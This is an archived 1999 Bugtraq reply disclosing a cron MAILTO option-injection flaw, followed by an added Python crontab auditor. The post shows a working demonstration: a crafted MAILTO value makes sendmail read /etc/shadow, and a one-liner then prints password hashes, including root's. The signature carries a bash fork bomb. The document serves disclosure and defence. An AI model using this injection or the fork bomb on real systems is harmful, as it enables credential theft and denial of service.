[11554] in bugtraq


Re: [RHSA-1999:030-01] Buffer overflow in cron daemon

daemon@ATHENA.MIT.EDU (Michal Zalewski)
Sat Aug 28 12:47:00 1999

Mime-Version: 1.0
Content-Type: TEXT/PLAIN; charset=US-ASCII
Message-Id:  <lcamtuf.4.05.9907050313390.622-100000@nimue.ids.pl>
Date:         Mon, 5 Jul 1999 03:27:32 +0200
Reply-To: Michal Zalewski <lcamtuf@IDS.PL>
From: Michal Zalewski <lcamtuf@IDS.PL>
X-To:         Bill Nottingham <notting@REDHAT.COM>
To: BUGTRAQ@SECURITYFOCUS.COM
In-Reply-To:  <19990825211720.A3016@xenomorph.redhat.com>

On Wed, 25 Aug 1999, Bill Nottingham wrote:

> To the best of our knowledge, no known exploits exist at this time.
>
> Also, it was possible to use specially formatted 'MAILTO' environment
> variables to send commands to sendmail.

Oh, something from scratch:

[lcamtuf@onehost lcamtuf]$ crontab -l
MAILTO='-bi -O AliasFile=/etc/shadow'

* * * * * nonexistent
[lcamtuf@onehost lcamtuf]$ sleep 60
[lcamtuf@onehost lcamtuf]$ strings -n 2 /etc/shadow.db|awk -F: '$2==""{print " - " $1 }$2!=""{printf $1}'|grep -v '*'
I15hybS.C.S1. - lcamtuf
hA/p45.MNqAtO - root
YoYwL/aBGnfAsRQ - testy

_______________________________________________________________________
Michal Zalewski [lcamtuf@ids.pl] [link / marchew] [dione.ids.pl SYSADM]
[Marchew Industries] ! [http://lcamtuf.na.export.pl] bash$ :(){ :|:&};:
[voice phone: +48 (0) 22 813 25 86] ? [cellular phone: (0) 501 4000 69]
To iterate is human, to recurse divine [P. Deutsch]
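
A defensive check for the MAILTO option injection shown in this message, added here as an example; it is not part of the original post or of any cron source. It scans crontab text for MAILTO values that a daemon placing them on the mailer command line would pass as options or extra arguments; the allow-list, function names and sample crontab are constructed assumptions.

```python
import re

# "MAILTO = value" environment line as it appears in a crontab.
ENV_LINE = re.compile(r"^\s*MAILTO\s*=\s*(.*?)\s*$")
# Conservative allow-list for recipients (an assumption, not cron's own rule).
SAFE_RECIPIENT = re.compile(r"^[A-Za-z0-9_.+@,-]+$")

# Constructed sample; line 3 carries the value shown in the post.
SAMPLE_CRONTAB = """\
# constructed sample crontab
MAILTO=ops@example.org
MAILTO='-bi -O AliasFile=/etc/shadow'
* * * * * nonexistent
MAILTO=""
"""

def unquote(value):
    """Strip one pair of matching single or double quotes."""
    if len(value) >= 2 and value[0] == value[-1] and value[0] in "'\"":
        return value[1:-1]
    return value

def check_mailto(value):
    """Return the reasons a MAILTO value is unsafe; an empty list means it passes."""
    if value == "":
        return []  # empty MAILTO means "send no mail"
    reasons = []
    if value.startswith("-"):
        reasons.append("leading '-' is read as a mailer option")
    if any(ch.isspace() for ch in value):
        reasons.append("whitespace splits the value into several arguments")
    if not reasons and not SAFE_RECIPIENT.match(value):
        reasons.append("characters outside the recipient allow-list")
    return reasons

def audit_crontab(text):
    """Return (line number, value, reasons) for every unsafe MAILTO line."""
    findings = []
    for lineno, line in enumerate(text.splitlines(), 1):
        match = ENV_LINE.match(line)
        if match:
            value = unquote(match.group(1))
            if check_mailto(value):
                findings.append((lineno, value, check_mailto(value)))
    return findings

if __name__ == "__main__":
    for lineno, value, reasons in audit_crontab(SAMPLE_CRONTAB):
        print("line %d: MAILTO=%r: %s" % (lineno, value, "; ".join(reasons)))
```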
